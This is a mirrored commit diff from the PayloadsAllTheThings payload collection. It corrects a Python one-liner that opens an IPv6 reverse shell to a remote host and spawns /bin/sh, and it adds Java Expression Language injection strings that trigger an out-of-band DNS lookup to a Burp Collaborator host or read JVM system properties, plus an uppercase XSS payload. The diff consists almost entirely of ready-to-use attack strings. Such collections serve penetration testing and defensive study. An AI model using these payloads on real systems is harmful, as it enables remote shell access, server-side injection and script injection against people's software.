mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Merge pull request #416 from Bort-Millipede/master
Expression Language Injection One-Liners; XSS Payload; Fixed Linux Py…
commit
f89597725a
@ -150,7 +150,7 @@ python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty")
|
|||||||
|
|
||||||
IPv6 (No Spaces, Shortened)
|
IPv6 (No Spaces, Shortened)
|
||||||
```python
|
```python
|
||||||
python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),,2);p("/bin/sh")'
|
python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
|
||||||
```
|
```
|
||||||
|
|
||||||
Windows only
|
Windows only
|
||||||
|
@ -149,6 +149,16 @@ ${1+1}
|
|||||||
#{1+1}
|
#{1+1}
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Expression Language EL - One-Liner injections not including code execution
|
||||||
|
|
||||||
|
```java
|
||||||
|
// DNS Lookup
|
||||||
|
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.burpcollaborator.net")}
|
||||||
|
|
||||||
|
// JVM System Property Lookup (ex: java.class.path)
|
||||||
|
${"".getClass().forName("java.lang.System").getDeclaredMethod("getProperty","".getClass()).invoke("","java.class.path")}
|
||||||
|
```
|
||||||
|
|
||||||
### Expression Language EL - Code Execution
|
### Expression Language EL - Code Execution
|
||||||
|
|
||||||
|
|
||||||
|
@ -260,6 +260,12 @@ e.g: 14.rs/#alert(document.domain)
|
|||||||
Use CTRL+SHIFT+X to trigger the onclick event
|
Use CTRL+SHIFT+X to trigger the onclick event
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### XSS when payload is reflected capitalized
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
<IMG SRC=1 ONERROR=alert(1)>
|
||||||
|
```
|
||||||
|
|
||||||
### DOM based XSS
|
### DOM based XSS
|
||||||
|
|
||||||
Based on a DOM XSS sink.
|
Based on a DOM XSS sink.
|
||||||
|